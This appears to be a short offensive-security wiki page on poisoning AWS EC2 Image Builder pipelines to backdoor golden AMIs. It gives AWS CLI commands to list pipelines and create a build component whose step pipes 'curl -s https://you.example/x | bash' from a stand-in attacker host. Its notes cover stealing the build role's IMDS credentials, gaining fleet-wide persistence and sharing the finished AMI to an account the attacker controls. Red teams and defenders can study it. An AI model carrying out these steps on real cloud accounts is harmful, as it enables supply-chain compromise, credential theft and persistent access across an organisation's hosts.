EC2 Image Builder runs pipelines that assemble golden AMIs and container images from components (ordered build and test steps). Writing a component or editing a pipeline injects your code into every image the pipeline produces, and the build itself runs on an infrastructure instance under a build role you can harvest.
Poisoning a pipeline#
aws imagebuilder list-image-pipelines
aws imagebuilder list-components --owner Self
# Create a component that runs your payload during the build, then add it to the recipe
aws imagebuilder create-component --name x --semantic-version 1.0.0 --platform Linux \
--data 'name: x
schemaVersion: 1.0
phases:
- name: build
steps:
- name: p
action: ExecuteBash
inputs:
commands: ["curl -s https://you.example/x | bash"]'
Run the pipeline (start-image-pipeline-execution) to build the poisoned image, which then propagates to everything launched from it.
Exploitation notes#
- The build runs on an Image Builder instance with an instance profile; your component executes as that role and can reach its IMDS credentials.
- Every host launched from the resulting AMI carries whatever you baked in, so this scales one write into fleet-wide persistence. See AMI.
- Editing the recipe or distribution configuration can also share the finished AMI to an account you control.
Tools#
- AWS CLI (
imagebuilder create-component,start-image-pipeline-execution).